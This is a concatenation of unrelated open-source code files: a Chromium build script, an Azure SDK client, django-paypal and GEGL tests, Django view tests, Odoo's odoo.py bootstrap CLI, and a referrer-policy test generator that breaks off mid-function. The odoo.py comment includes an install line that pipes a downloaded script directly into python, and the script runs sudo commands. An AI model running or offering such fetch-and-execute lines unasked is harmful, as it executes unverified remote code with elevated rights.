"""Pack relocations in a library (or copy unchanged).
If --enable-packing and --configuration-name=='Release', invoke the
relocation_packer tool to pack the .rel.dyn or .rela.dyn section in the given
library files. This step is inserted after the libraries are stripped.
If --enable-packing is zero, the script copies files verbatim, with no
attempt to pack relocations.
Any library listed in --exclude-packing-list is also copied verbatim,
irrespective of any --enable-packing setting. Typically this would be
'libchromium_android_linker.so'.
"""
import optparse
import os
import shlex
import shutil
import sys
import tempfile
from util import build_utils
def PackLibraryRelocations(android_pack_relocations, library_path, output_path):
shutil.copy(library_path, output_path)
pack_command = [android_pack_relocations, output_path]
build_utils.CheckOutput(pack_command)
def CopyLibraryUnchanged(library_path, output_path):
shutil.copy(library_path, output_path)
def main(args):
args = build_utils.ExpandFileArgs(args)
parser = optparse.OptionParser()
build_utils.AddDepfileOption(parser)
parser.add_option('--clear-dir', action='store_true',
help='If set, the destination directory will be deleted '
'before copying files to it. This is highly recommended to '
'ensure that no stale files are left in the directory.')
parser.add_option('--configuration-name',
default='Release',
help='Gyp configuration name (i.e. Debug, Release)')
parser.add_option('--enable-packing',
choices=['0', '1'],
help=('Pack relocations if 1 and configuration name is \'Release\','
' otherwise plain file copy'))
parser.add_option('--exclude-packing-list',
default='',
help='Names of any libraries explicitly not packed')
parser.add_option('--android-pack-relocations',
help='Path to the relocations packer binary')
parser.add_option('--stripped-libraries-dir',
help='Directory for stripped libraries')
parser.add_option('--packed-libraries-dir',
help='Directory for packed libraries')
parser.add_option('--libraries', action='append',
help='List of libraries')
parser.add_option('--stamp', help='Path to touch on success')
options, _ = parser.parse_args(args)
enable_packing = (options.enable_packing == '1' and
options.configuration_name == 'Release')
exclude_packing_set = set(shlex.split(options.exclude_packing_list))
libraries = []
for libs_arg in options.libraries:
libraries += build_utils.ParseGypList(libs_arg)
if options.clear_dir:
build_utils.DeleteDirectory(options.packed_libraries_dir)
build_utils.MakeDirectory(options.packed_libraries_dir)
for library in libraries:
library_path = os.path.join(options.stripped_libraries_dir, library)
output_path = os.path.join(
options.packed_libraries_dir, os.path.basename(library))
if enable_packing and library not in exclude_packing_set:
PackLibraryRelocations(options.android_pack_relocations,
library_path,
output_path)
else:
CopyLibraryUnchanged(library_path, output_path)
if options.depfile:
build_utils.WriteDepfile(
options.depfile,
libraries + build_utils.GetPythonDependencies())
if options.stamp:
build_utils.Touch(options.stamp)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
mit
|
Azure/azure-sdk-for-python
|
sdk/synapse/azure-synapse/azure/synapse/accesscontrol/aio/_access_control_client_async.py
|
1
|
2504
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, TYPE_CHECKING
from azure.core import AsyncPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration_async import AccessControlClientConfiguration
from .operations_async import AccessControlOperations
from .. import models
class AccessControlClient(object):
"""AccessControlClient.
:ivar access_control: AccessControlOperations operations
:vartype access_control: azure.synapse.accesscontrol.aio.operations_async.AccessControlOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param endpoint: The workspace development endpoint, for example https://myworkspace.dev.azuresynapse.net.
:type endpoint: str
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
def __init__(
self,
credential: "AsyncTokenCredential",
endpoint: str,
**kwargs: Any
) -> None:
base_url = '{endpoint}'
self._config = AccessControlClientConfiguration(credential, endpoint, **kwargs)
self._client = AsyncPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self.access_control = AccessControlOperations(
self._client, self._config, self._serialize, self._deserialize)
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "AccessControlClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
|
mit
|
GamesDoneQuick/django-paypal
|
paypal/pro/tests/test_pro.py
|
1
|
12369
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from decimal import Decimal
import mock
from django.contrib.auth import get_user_model
from django.forms import ValidationError
from django.test import TestCase
from django.test.client import RequestFactory
from django.test.utils import override_settings
from vcr import VCR
from paypal.pro.exceptions import PayPalFailure
from paypal.pro.fields import CreditCardField
from paypal.pro.helpers import VERSION, PayPalError, PayPalWPP, strip_ip_port
from paypal.pro.views import PayPalPro
from .settings import TEMPLATES
RF = RequestFactory()
vcr = VCR(path_transformer=VCR.ensure_suffix('.yaml'))
def make_request(user=None):
request = RF.get("/pay/", REMOTE_ADDR="127.0.0.1:8000")
if user is not None:
request.user = user
return request
class CreditCardFieldTest(TestCase):
def test_CreditCardField(self):
field = CreditCardField()
field.clean('4797503429879309')
self.assertEqual(field.card_type, "Visa")
self.assertRaises(ValidationError, CreditCardField().clean, '1234567890123455')
def test_invalidCreditCards(self):
self.assertEqual(CreditCardField().clean('4797-5034-2987-9309'), '4797503429879309')
def ppp_wrapper(request, handler=None):
item = {"paymentrequest_0_amt": "10.00",
"inv": "inventory",
"custom": "tracking",
"cancelurl": "http://foo.com/cancel",
"returnurl": "http://foo.com/return"}
if handler is None:
handler = lambda nvp: nvp # NOP
ppp = PayPalPro(
item=item, # what you're selling
payment_template="payment.html", # template name for payment
confirm_template="confirmation.html", # template name for confirmation
success_url="/success/", # redirect location after success
nvp_handler=handler
)
return ppp(request)
@override_settings(TEMPLATES=TEMPLATES)
class PayPalProTest(TestCase):
@vcr.use_cassette()
def test_get(self):
response = ppp_wrapper(RF.get('/'))
self.assertContains(response, 'Show me the money')
self.assertEqual(response.status_code, 200)
@vcr.use_cassette()
def test_get_redirect(self):
response = ppp_wrapper(RF.get('/', {'express': '1'}))
self.assertEqual(response.status_code, 302)
@vcr.use_cassette()
def test_validate_confirm_form_error(self):
response = ppp_wrapper(RF.post('/',
{'token': '123',
'PayerID': '456'}))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context_data.get('errors', ''),
PayPalPro.errors['processing'])
@vcr.use_cassette()
@mock.patch.object(PayPalWPP, 'doExpressCheckoutPayment', autospec=True)
def test_validate_confirm_form_ok(self, doExpressCheckoutPayment):
nvp = {'mock': True}
doExpressCheckoutPayment.return_value = nvp
received = []
def handler(nvp):
received.append(nvp)
response = ppp_wrapper(RF.post('/',
{'token': '123',
'PayerID': '456'}),
handler=handler)
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'], '/success/')
self.assertEqual(len(received), 1)
class PayPalWPPTest(TestCase):
def setUp(self):
self.item = {
'amt': '9.95',
'inv': 'inv',
'custom': 'custom',
'next': 'http://www.example.com/next/',
'returnurl': 'http://www.example.com/pay/',
'cancelurl': 'http://www.example.com/cancel/'
}
# Handle different parameters for Express Checkout
self.ec_item = {
'paymentrequest_0_amt': '9.95',
'inv': 'inv',
'custom': 'custom',
'next': 'http://www.example.com/next/',
'returnurl': 'http://www.example.com/pay/',
'cancelurl': 'http://www.example.com/cancel/'
}
def get_valid_doDirectPayment_data(self):
return {
'firstname': 'Brave',
'lastname': 'Star',
'street': '1 Main St',
'city': u'San Jos\xe9',
'state': 'CA',
'countrycode': 'US',
'zip': '95131',
'acct': '4032039938039650',
'expdate': '112021',
'cvv2': '',
'creditcardtype': 'visa',
'ipaddress': '10.0.1.199',
}
@vcr.use_cassette()
def test_doDirectPayment_missing_params(self):
wpp = PayPalWPP(make_request())
data = {'firstname': 'Chewbacca'}
self.assertRaises(PayPalError, wpp.doDirectPayment, data)
@vcr.use_cassette()
def test_doDirectPayment_valid(self):
wpp = PayPalWPP(make_request())
data = self.get_valid_doDirectPayment_data()
data.update(self.item)
nvp = wpp.doDirectPayment(data)
self.assertIsNotNone(nvp)
for k, v in [('avscode', 'X'),
('amt', '9.95'),
('correlationid', '1025431f33d89'),
('currencycode', 'USD'),
('ack', 'Success')]:
self.assertEqual(nvp.response_dict[k], v)
@vcr.use_cassette()
def test_doDirectPayment_authenticated_user(self):
User = get_user_model()
user = User.objects.create(username='testuser')
wpp = PayPalWPP(make_request(user=user))
data = self.get_valid_doDirectPayment_data()
data.update(self.item)
npm_obj = wpp.doDirectPayment(data)
self.assertEqual(npm_obj.user, user)
@vcr.use_cassette()
def test_doDirectPayment_invalid(self):
wpp = PayPalWPP(make_request())
data = {
'firstname': 'Epic',
'lastname': 'Fail',
'street': '100 Georgia St',
'city': 'Vancouver',
'state': 'BC',
'countrycode': 'CA',
'zip': 'V6V 1V1',
'expdate': '012019',
'cvv2': '999',
'acct': '1234567890',
'creditcardtype': 'visa',
'ipaddress': '10.0.1.199', }
data.update(self.item)
self.assertRaises(PayPalFailure, wpp.doDirectPayment, data)
@vcr.use_cassette()
def test_setExpressCheckout(self):
wpp = PayPalWPP(make_request())
nvp_obj = wpp.setExpressCheckout(self.ec_item)
self.assertEqual(nvp_obj.ack, "Success")
@vcr.use_cassette()
@mock.patch.object(PayPalWPP, '_request', autospec=True)
def test_doExpressCheckoutPayment(self, mock_request_object):
ec_token = 'EC-1234567890'
payerid = 'LXYZABC1234'
item = self.ec_item.copy()
item.update({'token': ec_token, 'payerid': payerid})
mock_request_object.return_value = 'ack=Success&token=%s&version=%spaymentinfo_0_amt=%s' % \
(ec_token, VERSION, self.ec_item['paymentrequest_0_amt'])
wpp = PayPalWPP(make_request())
wpp.doExpressCheckoutPayment(item)
call_args = mock_request_object.call_args
self.assertIn('VERSION=%s' % VERSION, call_args[0][1])
self.assertIn('METHOD=DoExpressCheckoutPayment', call_args[0][1])
self.assertIn('TOKEN=%s' % ec_token, call_args[0][1])
self.assertIn('PAYMENTREQUEST_0_AMT=%s' % item['paymentrequest_0_amt'],
call_args[0][1])
self.assertIn('PAYERID=%s' % payerid, call_args[0][1])
@vcr.use_cassette()
@mock.patch.object(PayPalWPP, '_request', autospec=True)
def test_doExpressCheckoutPayment_invalid(self, mock_request_object):
ec_token = 'EC-1234567890'
payerid = 'LXYZABC1234'
item = self.ec_item.copy()
item.update({'token': ec_token, 'payerid': payerid})
mock_request_object.return_value = 'ack=Failure&l_errorcode=42&l_longmessage0=Broken'
wpp = PayPalWPP(make_request())
with self.assertRaises(PayPalFailure):
wpp.doExpressCheckoutPayment(item)
@vcr.use_cassette()
@mock.patch.object(PayPalWPP, '_request', autospec=True)
def test_createBillingAgreement(self, mock_request_object):
mock_request_object.return_value = 'ack=Success&billingagreementid=B-XXXXX&version=%s' % VERSION
wpp = PayPalWPP(make_request())
nvp = wpp.createBillingAgreement({'token': 'dummy token'})
call_args = mock_request_object.call_args
self.assertIn('VERSION=%s' % VERSION, call_args[0][1])
self.assertIn('METHOD=CreateBillingAgreement', call_args[0][1])
self.assertIn('TOKEN=dummy+token', call_args[0][1])
self.assertEqual(nvp.method, 'CreateBillingAgreement')
self.assertEqual(nvp.ack, 'Success')
mock_request_object.return_value = 'ack=Failure&l_errorcode=42&l_longmessage0=Broken'
with self.assertRaises(PayPalFailure):
nvp = wpp.createBillingAgreement({'token': 'dummy token'})
@vcr.use_cassette()
@mock.patch.object(PayPalWPP, '_request', autospec=True)
def test_doReferenceTransaction_valid(self, mock_request_object):
reference_id = 'B-1234'
amount = Decimal('10.50')
mock_request_object.return_value = (
'ack=Success&paymentstatus=Completed&amt=%s&version=%s&billingagreementid=%s' %
(amount, VERSION, reference_id))
wpp = PayPalWPP(make_request())
nvp = wpp.doReferenceTransaction({'referenceid': reference_id,
'amt': amount})
call_args = mock_request_object.call_args
self.assertIn('VERSION=%s' % VERSION, call_args[0][1])
self.assertIn('METHOD=DoReferenceTransaction', call_args[0][1])
self.assertIn('REFERENCEID=%s' % reference_id, call_args[0][1])
self.assertIn('AMT=%s' % amount, call_args[0][1])
self.assertEqual(nvp.method, 'DoReferenceTransaction')
self.assertEqual(nvp.ack, 'Success')
@vcr.use_cassette()
@mock.patch.object(PayPalWPP, '_request', autospec=True)
def test_doReferenceTransaction_invalid(self, mock_request_object):
reference_id = 'B-1234'
amount = Decimal('10.50')
mock_request_object.return_value = 'ack=Failure&l_errorcode=42&l_longmessage0=Broken'
wpp = PayPalWPP(make_request())
with self.assertRaises(PayPalFailure):
wpp.doReferenceTransaction({'referenceid': reference_id,
'amt': amount})
def test_strip_ip_port(self):
IPv4 = '192.168.0.1'
IPv6 = '2001:0db8:85a3:0000:0000:8a2e:0370:7334'
PORT = '8000'
# IPv4 with port
test = '%s:%s' % (IPv4, PORT)
self.assertEqual(IPv4, strip_ip_port(test))
# IPv4 without port
test = IPv4
self.assertEqual(IPv4, strip_ip_port(test))
# IPv6 with port
test = '[%s]:%s' % (IPv6, PORT)
self.assertEqual(IPv6, strip_ip_port(test))
# IPv6 without port
test = IPv6
self.assertEqual(IPv6, strip_ip_port(test))
# No IP
self.assertEqual('', strip_ip_port(''))
# -- DoExpressCheckoutPayment
# PayPal Request:
# {'amt': '10.00',
# 'cancelurl': u'http://xxx.xxx.xxx.xxx/deploy/480/upgrade/?upgrade=cname',
# 'custom': u'website_id=480&cname=1',
# 'inv': u'website-480-cname',
# 'method': 'DoExpressCheckoutPayment',
# 'next': u'http://xxx.xxx.xxx.xxx/deploy/480/upgrade/?upgrade=cname',
# 'payerid': u'BN5JZ2V7MLEV4',
# 'paymentaction': 'Sale',
# 'returnurl': u'http://xxx.xxx.xxx.xxx/deploy/480/upgrade/?upgrade=cname',
# 'token': u'EC-6HW17184NE0084127'}
#
# PayPal Response:
# {'ack': 'Success',
# 'amt': '10.00',
# 'build': '848077',
# 'correlationid': '375f4773c3d34',
# 'currencycode': 'USD',
# 'feeamt': '0.59',
# 'ordertime': '2009-03-04T20:56:08Z',
# 'paymentstatus': 'Completed',
# 'paymenttype': 'instant',
# 'pendingreason': 'None',
# 'reasoncode': 'None',
# 'taxamt': '0.00',
# 'timestamp': '2009-03-04T20:56:09Z',
# 'token': 'EC-6HW17184NE0084127',
# 'transactionid': '3TG42202A7335864V',
# 'transactiontype': 'expresscheckout',
# 'version': '54.0'}
|
mit
|
OpenCL/GEGL-OpenCL-old
|
tests/python/test-gegl-color.py
|
7
|
3300
|
#!/usr/bin/env python
""" This file is part of GEGL
*
* GEGL is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 3 of the License, or (at your option) any later version.
*
* GEGL is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with GEGL; if not, see <http://www.gnu.org/licenses/>.
*
* Copyright 2013 Daniel Sabo <[email protected]>
"""
import unittest
from gi.repository import Gegl
class TestGeglColor(unittest.TestCase):
def assertAlmostEqualComps(self, a, b):
self.assertEqual(len(a), len(b))
for acomp, bcomp in zip(a, b):
self.assertAlmostEqual(acomp, bcomp)
def test_new_color(self):
Gegl.Color.new("rgba(0.6, 0.6, 0.6, 1.0)")
def test_new_color_string(self):
Gegl.Color(string="rgba(0.6, 0.6, 0.6, 1.0)")
def test_color_set_rgba(self):
c = Gegl.Color.new("rgba(1.0, 1.0, 1.0, 1.0)")
values = c.get_rgba()
self.assertAlmostEqual(values[0], 1.0)
self.assertAlmostEqual(values[1], 1.0)
self.assertAlmostEqual(values[2], 1.0)
self.assertAlmostEqual(values[3], 1.0)
c.set_rgba(0.3, 0.6, 0.9, 1.0)
values = c.get_rgba()
self.assertAlmostEqual(values[0], 0.3)
self.assertAlmostEqual(values[1], 0.6)
self.assertAlmostEqual(values[2], 0.9)
self.assertAlmostEqual(values[3], 1.0)
def test_color_get_components(self):
c = Gegl.Color()
c.set_components(Gegl.format("RGB float"), [1.0, 0.0, 0.0])
values = c.get_components(Gegl.format("RGB float"))
self.assertAlmostEqualComps(values, [1.0, 0.0, 0.0])
values = c.get_components(Gegl.format("RGBA double"))
self.assertAlmostEqualComps(values, [1.0, 0.0, 0.0, 1.0])
values = c.get_components(Gegl.format("RGBA float"))
self.assertAlmostEqualComps(values, [1.0, 0.0, 0.0, 1.0])
values = c.get_components(Gegl.format("RGBA u32"))
self.assertEqual(values, [float(0xFFFFFFFF), 0.0, 0.0, float(0xFFFFFFFF)])
values = c.get_components(Gegl.format("RGBA u16"))
self.assertEqual(values, [float(0xFFFF), 0.0, 0.0, float(0xFFFF)])
values = c.get_components(Gegl.format("RGBA u8"))
self.assertEqual(values, [float(0xFF), 0.0, 0.0, float(0xFF)])
c.set_components(Gegl.format("R'G'B' u8"), [128, 0, 128])
values = c.get_components(Gegl.format("R'G'B'A u8"))
self.assertEqual(values, [float(128), 0.0, float(128), float(255)])
c.set_components(Gegl.format("YA double"), [0.5, 0.5])
values = c.get_components(Gegl.format("RGBA double"))
self.assertAlmostEqualComps(values, [0.5, 0.5, 0.5, 0.5])
values = c.get_components(Gegl.format("RaGaBaA double"))
self.assertAlmostEqualComps(values, [0.25, 0.25, 0.25, 0.5])
if __name__ == '__main__':
Gegl.init(None);
unittest.main()
Gegl.exit()
|
lgpl-3.0
|
phoebusliang/parallel-lettuce
|
tests/integration/lib/Django-1.2.5/tests/regressiontests/views/tests/defaults.py
|
39
|
3922
|
from os import path
from django.conf import settings
from django.test import TestCase
from django.contrib.contenttypes.models import ContentType
from regressiontests.views.models import Author, Article, UrlArticle
class DefaultsTests(TestCase):
"""Test django views in django/views/defaults.py"""
fixtures = ['testdata.json']
non_existing_urls = ['/views/non_existing_url/', # this is in urls.py
'/views/other_non_existing_url/'] # this NOT in urls.py
def test_shortcut_with_absolute_url(self):
"Can view a shortcut for an Author object that has a get_absolute_url method"
for obj in Author.objects.all():
short_url = '/views/shortcut/%s/%s/' % (ContentType.objects.get_for_model(Author).id, obj.pk)
response = self.client.get(short_url)
self.assertRedirects(response, 'http://testserver%s' % obj.get_absolute_url(),
status_code=302, target_status_code=404)
def test_shortcut_no_absolute_url(self):
"Shortcuts for an object that has no get_absolute_url method raises 404"
for obj in Article.objects.all():
short_url = '/views/shortcut/%s/%s/' % (ContentType.objects.get_for_model(Article).id, obj.pk)
response = self.client.get(short_url)
self.assertEquals(response.status_code, 404)
def test_wrong_type_pk(self):
short_url = '/views/shortcut/%s/%s/' % (ContentType.objects.get_for_model(Author).id, 'nobody/expects')
response = self.client.get(short_url)
self.assertEquals(response.status_code, 404)
def test_shortcut_bad_pk(self):
short_url = '/views/shortcut/%s/%s/' % (ContentType.objects.get_for_model(Author).id, '42424242')
response = self.client.get(short_url)
self.assertEquals(response.status_code, 404)
def test_nonint_content_type(self):
an_author = Author.objects.all()[0]
short_url = '/views/shortcut/%s/%s/' % ('spam', an_author.pk)
response = self.client.get(short_url)
self.assertEquals(response.status_code, 404)
def test_bad_content_type(self):
an_author = Author.objects.all()[0]
short_url = '/views/shortcut/%s/%s/' % (42424242, an_author.pk)
response = self.client.get(short_url)
self.assertEquals(response.status_code, 404)
def test_page_not_found(self):
"A 404 status is returned by the page_not_found view"
for url in self.non_existing_urls:
response = self.client.get(url)
self.assertEquals(response.status_code, 404)
def test_csrf_token_in_404(self):
"""
The 404 page should have the csrf_token available in the context
"""
# See ticket #14565
old_DEBUG = settings.DEBUG
try:
settings.DEBUG = False # so we get real 404, not technical
for url in self.non_existing_urls:
response = self.client.get(url)
csrf_token = response.context['csrf_token']
self.assertNotEqual(str(csrf_token), 'NOTPROVIDED')
self.assertNotEqual(str(csrf_token), '')
finally:
settings.DEBUG = old_DEBUG
def test_server_error(self):
"The server_error view raises a 500 status"
response = self.client.get('/views/server_error/')
self.assertEquals(response.status_code, 500)
def test_get_absolute_url_attributes(self):
"A model can set attributes on the get_absolute_url method"
self.assertTrue(getattr(UrlArticle.get_absolute_url, 'purge', False),
'The attributes of the original get_absolute_url must be added.')
article = UrlArticle.objects.get(pk=1)
self.assertTrue(getattr(article.get_absolute_url, 'purge', False),
'The attributes of the original get_absolute_url must be added.')
|
gpl-3.0
|
Antiun/c2c-rd-addons
|
c2c_product_price_unit/__init__.py
|
4
|
1244
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
# Copyright (C) 2010-2012 ChriCar Beteiligungs- und Beratungs- GmbH (<http://www.camptocamp.at>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import purchase
import sale
import account_invoice
import stock
import hr_expense
import wizard
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
ojengwa/odoo
|
odoo.py
|
257
|
5618
|
#!/usr/bin/env python
#----------------------------------------------------------
# odoo cli
#
# To install your odoo development environement type:
#
# wget -O- https://raw.githubusercontent.com/odoo/odoo/8.0/odoo.py | python
#
# The setup_* subcommands used to boostrap odoo are defined here inline and may
# only depends on the python 2.7 stdlib
#
# The rest of subcommands are defined in odoo/cli or in <module>/cli by
# subclassing the Command object
#
#----------------------------------------------------------
import os
import re
import sys
import subprocess
GIT_HOOKS_PRE_PUSH = """
#!/usr/bin/env python2
import re
import sys
if re.search('github.com[:/]odoo/odoo.git$', sys.argv[2]):
print "Pushing to /odoo/odoo.git is forbidden, please push to odoo-dev, use --no-verify to override"
sys.exit(1)
"""
def printf(f,*l):
print "odoo:" + f % l
def run(*l):
if isinstance(l[0], list):
l = l[0]
printf("running %s", " ".join(l))
subprocess.check_call(l)
def git_locate():
# Locate git dir
# TODO add support for os.environ.get('GIT_DIR')
# check for an odoo child
if os.path.isfile('odoo/.git/config'):
os.chdir('odoo')
path = os.getcwd()
while path != os.path.abspath(os.sep):
gitconfig_path = os.path.join(path, '.git/config')
if os.path.isfile(gitconfig_path):
release_py = os.path.join(path, 'openerp/release.py')
if os.path.isfile(release_py):
break
path = os.path.dirname(path)
if path == os.path.abspath(os.sep):
path = None
return path
def cmd_setup_git():
git_dir = git_locate()
if git_dir:
printf('git repo found at %s',git_dir)
else:
run("git", "init", "odoo")
os.chdir('odoo')
git_dir = os.getcwd()
if git_dir:
# push sane config for git < 2.0, and hooks
#run('git','config','push.default','simple')
# alias
run('git','config','alias.st','status')
# merge bzr style
run('git','config','merge.commit','no')
# pull let me choose between merge or rebase only works in git > 2.0, use an alias for 1
run('git','config','pull.ff','only')
run('git','config','alias.pl','pull --ff-only')
pre_push_path = os.path.join(git_dir, '.git/hooks/pre-push')
open(pre_push_path,'w').write(GIT_HOOKS_PRE_PUSH.strip())
os.chmod(pre_push_path, 0755)
# setup odoo remote
run('git','config','remote.odoo.url','https://github.com/odoo/odoo.git')
run('git','config','remote.odoo.pushurl','[email protected]:odoo/odoo.git')
run('git','config','--add','remote.odoo.fetch','dummy')
run('git','config','--unset-all','remote.odoo.fetch')
run('git','config','--add','remote.odoo.fetch','+refs/heads/*:refs/remotes/odoo/*')
# setup odoo-dev remote
run('git','config','remote.odoo-dev.url','https://github.com/odoo-dev/odoo.git')
run('git','config','remote.odoo-dev.pushurl','[email protected]:odoo-dev/odoo.git')
run('git','remote','update')
# setup 8.0 branch
run('git','config','branch.8.0.remote','odoo')
run('git','config','branch.8.0.merge','refs/heads/8.0')
run('git','checkout','8.0')
else:
printf('no git repo found')
def cmd_setup_git_dev():
git_dir = git_locate()
if git_dir:
# setup odoo-dev remote
run('git','config','--add','remote.odoo-dev.fetch','dummy')
run('git','config','--unset-all','remote.odoo-dev.fetch')
run('git','config','--add','remote.odoo-dev.fetch','+refs/heads/*:refs/remotes/odoo-dev/*')
run('git','config','--add','remote.odoo-dev.fetch','+refs/pull/*:refs/remotes/odoo-dev/pull/*')
run('git','remote','update')
def cmd_setup_git_review():
git_dir = git_locate()
if git_dir:
# setup odoo-dev remote
run('git','config','--add','remote.odoo.fetch','dummy')
run('git','config','--unset-all','remote.odoo.fetch')
run('git','config','--add','remote.odoo.fetch','+refs/heads/*:refs/remotes/odoo/*')
run('git','config','--add','remote.odoo.fetch','+refs/tags/*:refs/remotes/odoo/tags/*')
run('git','config','--add','remote.odoo.fetch','+refs/pull/*:refs/remotes/odoo/pull/*')
def setup_deps_debian(git_dir):
debian_control_path = os.path.join(git_dir, 'debian/control')
debian_control = open(debian_control_path).read()
debs = re.findall('python-[0-9a-z]+',debian_control)
debs += ["postgresql"]
proc = subprocess.Popen(['sudo','apt-get','install'] + debs, stdin=open('/dev/tty'))
proc.communicate()
def cmd_setup_deps():
git_dir = git_locate()
if git_dir:
if os.path.isfile('/etc/debian_version'):
setup_deps_debian(git_dir)
def setup_pg_debian(git_dir):
cmd = ['sudo','su','-','postgres','-c','createuser -s %s' % os.environ['USER']]
subprocess.call(cmd)
def cmd_setup_pg():
git_dir = git_locate()
if git_dir:
if os.path.isfile('/etc/debian_version'):
setup_pg_debian(git_dir)
def cmd_setup():
cmd_setup_git()
cmd_setup_deps()
cmd_setup_pg()
def main():
# regsitry of commands
g = globals()
cmds = dict([(i[4:],g[i]) for i in g if i.startswith('cmd_')])
# if curl URL | python2 then use command setup
if len(sys.argv) == 1 and __file__ == '<stdin>':
cmd_setup()
elif len(sys.argv) == 2 and sys.argv[1] in cmds:
cmds[sys.argv[1]]()
else:
import openerp
openerp.cli.main()
if __name__ == "__main__":
main()
|
agpl-3.0
|
Jayflux/servo
|
tests/wpt/mozilla/tests/mozilla/referrer-policy/generic/tools/generate.py
|
53
|
7650
|
#!/usr/bin/env python
import os, sys, json
from common_paths import *
import spec_validator
import argparse
def expand_test_expansion_pattern(spec_test_expansion, test_expansion_schema):
expansion = {}
for artifact in spec_test_expansion:
artifact_value = spec_test_expansion[artifact]
if artifact_value == '*':
expansion[artifact] = test_expansion_schema[artifact]
elif isinstance(artifact_value, list):
expansion[artifact] = artifact_value
else:
expansion[artifact] = [artifact_value]
return expansion
def permute_expansion(expansion, selection = {}, artifact_index = 0):
artifact_order = ['delivery_method', 'redirection', 'origin',
'source_protocol', 'target_protocol', 'subresource',
'referrer_url', 'name']
if artifact_index >= len(artifact_order):
yield selection
return
artifact_key = artifact_order[artifact_index]
for artifact_value in expansion[artifact_key]:
selection[artifact_key] = artifact_value
for next_selection in permute_expansion(expansion,
selection,
artifact_index + 1):
yield next_selection
def generate_selection(selection, spec, subresource_path,
test_html_template_basename):
selection['spec_name'] = spec['name']
selection['spec_title'] = spec['title']
selection['spec_description'] = spec['description']
selection['spec_specification_url'] = spec['specification_url']
selection['subresource_path'] = subresource_path
# Oddball: it can be None, so in JS it's null.
selection['referrer_policy_json'] = json.dumps(spec['referrer_policy'])
test_filename = test_file_path_pattern % selection
test_directory = os.path.dirname(test_filename)
full_path = os.path.join(spec_directory, test_directory)
test_html_template = get_template(test_html_template_basename)
test_js_template = get_template("test.js.template")
disclaimer_template = get_template('disclaimer.template')
test_description_template = get_template("test_description.template")
html_template_filename = os.path.join(template_directory,
test_html_template_basename)
generated_disclaimer = disclaimer_template \
% {'generating_script_filename': os.path.relpath(__file__,
test_root_directory),
'html_template_filename': os.path.relpath(html_template_filename,
test_root_directory)}
# Adjust the template for the test invoking JS. Indent it to look nice.
selection['generated_disclaimer'] = generated_disclaimer.rstrip()
test_description_template = \
test_description_template.rstrip().replace("\n", "\n" + " " * 33)
selection['test_description'] = test_description_template % selection
# Adjust the template for the test invoking JS. Indent it to look nice.
indent = "\n" + " " * 6;
test_js_template = indent + test_js_template.replace("\n", indent);
selection['test_js'] = test_js_template % selection
# Directory for the test files.
try:
os.makedirs(full_path)
except:
pass
selection['meta_delivery_method'] = ''
if spec['referrer_policy'] != None:
if selection['delivery_method'] == 'meta-referrer':
selection['meta_delivery_method'] = \
'<meta name="referrer" content="%(referrer_policy)s">' % spec
elif selection['delivery_method'] == 'meta-csp':
selection['meta_delivery_method'] = \
'<meta http-equiv="Content-Security-Policy" ' + \
'content="referrer %(referrer_policy)s">' % spec
elif selection['delivery_method'] == 'http-rp':
selection['meta_delivery_method'] = \
'<!-- No meta: Referrer policy delivered via HTTP headers. -->' \
'<meta name="http-referrer-policy" content="%(referrer_policy)s">' % spec
test_headers_filename = test_filename + ".headers"
with open(test_headers_filename, "w") as f:
f.write('Referrer-Policy: ' + \
'%(referrer_policy)s\n' % spec)
# TODO(kristijanburnik): Limit to WPT origins.
f.write('Access-Control-Allow-Origin: *\n')
elif selection['delivery_method'] == 'attr-referrer':
# attr-referrer is supported by the JS test wrapper.
pass
elif selection['delivery_method'] == 'rel-noreferrer':
# rel=noreferrer is supported by the JS test wrapper.
pass
else:
raise ValueError('Not implemented delivery_method: ' \
+ selection['delivery_method'])
# Obey the lint and pretty format.
if len(selection['meta_delivery_method']) > 0:
selection['meta_delivery_method'] = "\n " + \
selection['meta_delivery_method']
with open(test_filename, 'w') as f:
f.write(test_html_template % selection)
def generate_test_source_files(spec_json, target):
test_expansion_schema = spec_json['test_expansion_schema']
specification = spec_json['specification']
spec_json_js_template = get_template('spec_json.js.template')
with open(generated_spec_json_filename, 'w') as f:
f.write(spec_json_js_template
% {'spec_json': json.dumps(spec_json)})
# Choose a debug/release template depending on the target.
